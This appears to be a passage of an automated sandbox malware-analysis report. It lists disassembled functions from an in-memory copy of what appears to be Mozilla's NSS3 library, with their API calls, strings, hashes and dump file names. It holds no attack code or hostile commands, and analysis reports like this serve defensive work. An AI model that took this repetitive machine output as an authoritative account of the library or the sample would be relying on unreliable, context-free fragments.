Part of subcall function 6CB35B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB35B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB33D3F

Part of subcall function 6CAABA90: PORT_NewArena_Util.NSS3(00000800,6CB33CAF,?), ref: 6CAABABF
Part of subcall function 6CAABA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CB33CAF,?), ref: 6CAABAD5
Part of subcall function 6CAABA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CB33CAF,?), ref: 6CAABB08
Part of subcall function 6CAABA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CB33CAF,?), ref: 6CAABB1A
Part of subcall function 6CAABA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CB33CAF,?), ref: 6CAABB3B

PR_EnterMonitor.NSS3(?), ref: 6CB33CCB

Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690AB
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690C9
Part of subcall function 6CB69090: EnterCriticalSection.KERNEL32 ref: 6CB690E5
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB69116
Part of subcall function 6CB69090: LeaveCriticalSection.KERNEL32 ref: 6CB6913F

PR_EnterMonitor.NSS3(?), ref: 6CB33CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB33CF8
PR_ExitMonitor.NSS3(?), ref: 6CB33D15
PR_ExitMonitor.NSS3(?), ref: 6CB33D2E

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: 8a67af577a20323c620e0ef3f88a2689e1fe868ab48793aeff26cfc553df7cc8
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: 90112BB5A506A06FE7215E65FC4179FB2E8EF11608F505534E40EC7B20E632F81EC653

Function 6CAFFDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CAFFE08

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CAFFE1D

Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CAFFE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CAFFE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CAFFE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6CAFFE6F

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: b3fe754ef3d8df59e77c40527cc0c5d4bcd27393c5fd1ccbb52be848012a5aee
Instruction ID: df7c7c7245ef3cbfdb93ad6b83ffa6f269aa1abc4857519ef02ff1c9c54d8f46
Opcode Fuzzy Hash: b3fe754ef3d8df59e77c40527cc0c5d4bcd27393c5fd1ccbb52be848012a5aee
Instruction Fuzzy Hash: 5011E5B7A00241ABEB008F55EC40A5B7BE8EF54299F188038F93997B12E731E995C791

Function 6CBAFD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6CBAFD9E

Part of subcall function 6CB69BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CA91A48), ref: 6CB69BB3
Part of subcall function 6CB69BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA91A48), ref: 6CB69BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6CBAFDB9

Part of subcall function 6CA8A900: TlsGetValue.KERNEL32(00000000,?,6CC014E4,?,6CA24DD9), ref: 6CA8A90F
Part of subcall function 6CA8A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CA8A94F

PR_Unlock.NSS3 ref: 6CBAFDD4
PR_Lock.NSS3 ref: 6CBAFDF2
PR_NotifyAllCondVar.NSS3 ref: 6CBAFE0D
PR_Unlock.NSS3 ref: 6CBAFE23

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: 5f1d710f602f950452473dceb3442d59837b89d4f4b59e63ceb98a91fb22e493
Instruction ID: 487488c7ff2dcc92b2268c1ebd4785dc7db59e933f42310ce931c5eef59ae6cd
Opcode Fuzzy Hash: 5f1d710f602f950452473dceb3442d59837b89d4f4b59e63ceb98a91fb22e493
Instruction Fuzzy Hash: E6018EB6B042919BDF054FA9FC00895B771EB0226C7154379E86647BF1E722DD29C782

Function 6CA8AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA8AFDA

Strings

unable to delete/modify collation sequence due to active statements, xrefs: 6CA8AF5C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA8AFC4
%s at line %d of [%.10s], xrefs: 6CA8AFD3
misuse, xrefs: 6CA8AFCE

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 7ddad1854f9b4d4601d90907b29399740ef1d935e98caf99155b7ee848e782e5
Instruction ID: 7e6b3f418457a3e541bd5484552d4c054fee477f935597f1c6d2079941c5b15d
Opcode Fuzzy Hash: 7ddad1854f9b4d4601d90907b29399740ef1d935e98caf99155b7ee848e782e5
Instruction Fuzzy Hash: EE91F275B062158FDB04CF69C850BAABBF2BF49314F1D85A8E865AB791D730EC41CB60

Function 6CAEFC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CAEFC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAEFCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CAEFDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CAEFDDE

Part of subcall function 6CAF8800: TlsGetValue.KERNEL32(?,6CB0085A,00000000,?,6CAA8369,?), ref: 6CAF8821
Part of subcall function 6CAF8800: TlsGetValue.KERNEL32(?,?,6CB0085A,00000000,?,6CAA8369,?), ref: 6CAF883D
Part of subcall function 6CAF8800: EnterCriticalSection.KERNEL32(?,?,?,6CB0085A,00000000,?,6CAA8369,?), ref: 6CAF8856
Part of subcall function 6CAF8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CAF8887
Part of subcall function 6CAF8800: PR_Unlock.NSS3(?,?,?,?,6CB0085A,00000000,?,6CAA8369,?), ref: 6CAF8899

Strings

pkcs11:, xrefs: 6CAEFC4F

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: 78c87453742a9e7861f772232e57c5e9cb73b13ccd5902e40dd3bdfc19b7479d
Instruction ID: d1cbcc049dcdddccd76f91a7d2cc47dfd6ce3a8088ffb83b60955e55328b12f2
Opcode Fuzzy Hash: 78c87453742a9e7861f772232e57c5e9cb73b13ccd5902e40dd3bdfc19b7479d
Instruction Fuzzy Hash: 1E5106B1B011119BEF008F65AD80B5A3B74EB4935CF29002DED146BB41E731E989EBD2

Function 6CA2BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6CA2BE02

Part of subcall function 6CB59C40: memcmp.VCRUNTIME140(?,00000000,6CA2C52B), ref: 6CB59D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA2BE9F

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA2BE89
%s at line %d of [%.10s], xrefs: 6CA2BE98
database corruption, xrefs: 6CA2BE93

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: 4609c085d17cadfaf152653df51416aa3bbb4896b92b95ca7163d4196c02b241
Instruction ID: ff763d955eb31d9d53e0bf8af643f0e9303ff8faf9534e631907cd87ab366fea
Opcode Fuzzy Hash: 4609c085d17cadfaf152653df51416aa3bbb4896b92b95ca7163d4196c02b241
Instruction Fuzzy Hash: AB314831A042B58BC700CF69E8D4AAFBBB2AF41314B1D8654EE5A1BB41D378EC84C7D1

Function 6CA90DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CA90BDE), ref: 6CA90DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6CA90BDE), ref: 6CA90DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CA90BDE), ref: 6CA90DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CA90BDE), ref: 6CA90E32

Strings

%s incr => %d (find lib), xrefs: 6CA90E2D

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 7176ee4b4290d2e449581bad5a36fedb6c6c50e72cb7194c5d45efc792fef27a
Instruction ID: 4ebf6b7473750a6138d0b4b3bd8d45c0ec7c8e262e56ad0e1386c16f77ef89f7
Opcode Fuzzy Hash: 7176ee4b4290d2e449581bad5a36fedb6c6c50e72cb7194c5d45efc792fef27a
Instruction Fuzzy Hash: E401D4727003549FE7209F249C86E2B73FCDB49A49B05446DE909E3B51EB62FC5886E1

Function 6CA39C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CA39CF2
LeaveCriticalSection.KERNEL32(?), ref: 6CA39D45
EnterCriticalSection.KERNEL32(?), ref: 6CA39D8B
LeaveCriticalSection.KERNEL32(?), ref: 6CA39DDE

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 260249dc42c2f8b0201e5c6d3f546892727ab472cb71b797fcb6fcad71ba8435
Instruction ID: 1ec9e4ad05a3e92ac60a1a4c1d37fdc636e8209679760de2bb14f0e4c5930569
Opcode Fuzzy Hash: 260249dc42c2f8b0201e5c6d3f546892727ab472cb71b797fcb6fcad71ba8435
Instruction Fuzzy Hash: 56A1A1317041508FEB09DF74EAAA77E3775BB82309F18112DD41A97B40DF3A9886CB92

Function 6CAC1E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6CAC1ECC

Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690AB
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690C9
Part of subcall function 6CB69090: EnterCriticalSection.KERNEL32 ref: 6CB690E5
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB69116
Part of subcall function 6CB69090: LeaveCriticalSection.KERNEL32 ref: 6CB6913F

TlsGetValue.KERNEL32 ref: 6CAC1EDF
EnterCriticalSection.KERNEL32(?), ref: 6CAC1EEF
PR_ExitMonitor.NSS3(?), ref: 6CAC1F37
PR_Unlock.NSS3(?), ref: 6CAC1F44

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
String ID:
API String ID: 3539092540-0
Opcode ID: a0be30f54b2db2fed1dfb16b9dee8d3cee8d6ae4b9159c8cb9bdfe4b7d841ab2
Instruction ID: c901d4f6cb420e751286ce89c736ad7eeabdbaffe1115ae419a9cb35ced772e0
Opcode Fuzzy Hash: a0be30f54b2db2fed1dfb16b9dee8d3cee8d6ae4b9159c8cb9bdfe4b7d841ab2
Instruction Fuzzy Hash: 15719D75B043019FD700CF24D840A6AB7F5BF89358F18492AE9A993B11E731E999CBD2

Function 6CB4DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CB4DD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6CB4DDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6CB4DE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CB4DE77

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: b01311b19a35cc64bf40e71f26c77fadbca2233c72012ca5c41d4e89f089a750
Instruction ID: c2fe6d4e973ce758510e0093f31580be0800d21352b260002ba8dc6e615d7dbc
Opcode Fuzzy Hash: b01311b19a35cc64bf40e71f26c77fadbca2233c72012ca5c41d4e89f089a750
Instruction Fuzzy Hash: 23717571A08324CFCF20CFAAD580A89B7B4FF49718F25816DD9586B70AD730A945DF81

Function 6CABDFA0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 6CABAB10: DeleteCriticalSection.KERNEL32(D958E852,6CAC1397,5B5F5EC0,?,?,6CABB1EE,2404110F,?,?), ref: 6CABAB3C
Part of subcall function 6CABAB10: free.MOZGLUE(D958E836,?,6CABB1EE,2404110F,?,?), ref: 6CABAB49
Part of subcall function 6CABAB10: DeleteCriticalSection.KERNEL32(5D5E6CCB), ref: 6CABAB5C
Part of subcall function 6CABAB10: free.MOZGLUE(5D5E6CBF), ref: 6CABAB63
Part of subcall function 6CABAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CABAB6F
Part of subcall function 6CABAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CABAB76

TlsGetValue.KERNEL32(?,?,6CABB266,6CAC15C6,?,?,6CAC15C6), ref: 6CABDFDA
EnterCriticalSection.KERNEL32(?,?,?,6CABB266,6CAC15C6,?,?,6CAC15C6), ref: 6CABDFF3
PK11_IsFriendly.NSS3(?,?,?,?,6CABB266,6CAC15C6,?,?,6CAC15C6), ref: 6CABE029
PK11_IsLoggedIn.NSS3 ref: 6CABE046

Part of subcall function 6CAC8F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAC8FAF
Part of subcall function 6CAC8F70: PR_Now.NSS3(?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAC8FD1
Part of subcall function 6CAC8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAC8FFA
Part of subcall function 6CAC8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CAC9013
Part of subcall function 6CAC8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353), ref: 6CAC9042
Part of subcall function 6CAC8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAC905A
Part of subcall function 6CAC8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CAC9073
Part of subcall function 6CAC8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CABDA9B,?,00000000,?,?,?,?,CE534353), ref: 6CAC9111

PR_Unlock.NSS3(?,?,?,?,6CABB266,6CAC15C6,?,?,6CAC15C6), ref: 6CABE149

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
String ID:
API String ID: 4224391822-0
Opcode ID: 4c116dd9e55f48a18e55b04b003f81870cab23ba9f19f82768cfe5d72fb838e1
Instruction ID: 55e27edd83481a0e43aa2d8dad05b5c47eedf729af450949e59ae4134a4f5091
Opcode Fuzzy Hash: 4c116dd9e55f48a18e55b04b003f81870cab23ba9f19f82768cfe5d72fb838e1
Instruction Fuzzy Hash: 41515774604601CFDB10DF28C58476ABBF9FF44309F1989ACD899ABB41D735E889CB82

Function 6CACBE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6CACBF06
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CACBF56
PR_SetError.NSS3(FFFFE005,00000000,?,?,6CAA9F71,?,?,00000000), ref: 6CACBF7F
CERT_DestroyCertificate.NSS3(00000000), ref: 6CACBFA9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CACC014

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Item_Util$Zfree$CertificateDestroyEncodeError
String ID:
API String ID: 3689625208-0
Opcode ID: 464103733237830d849b933b52c19c2122de1505e228e52fa7d993630d94150c
Instruction ID: 3e8649096be174cda0c7178095fee679ae689b7e8625949642359084207265a0
Opcode Fuzzy Hash: 464103733237830d849b933b52c19c2122de1505e228e52fa7d993630d94150c
Instruction Fuzzy Hash: 6041D775B012059BEB00DE65DD40BBA73F9AF45208F194228E919E7B41FB33D989CBD2

Function 6CA9EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA9EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6CA9EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CA9EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA9EEEB
free.MOZGLUE(?), ref: 6CA9EEF6

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

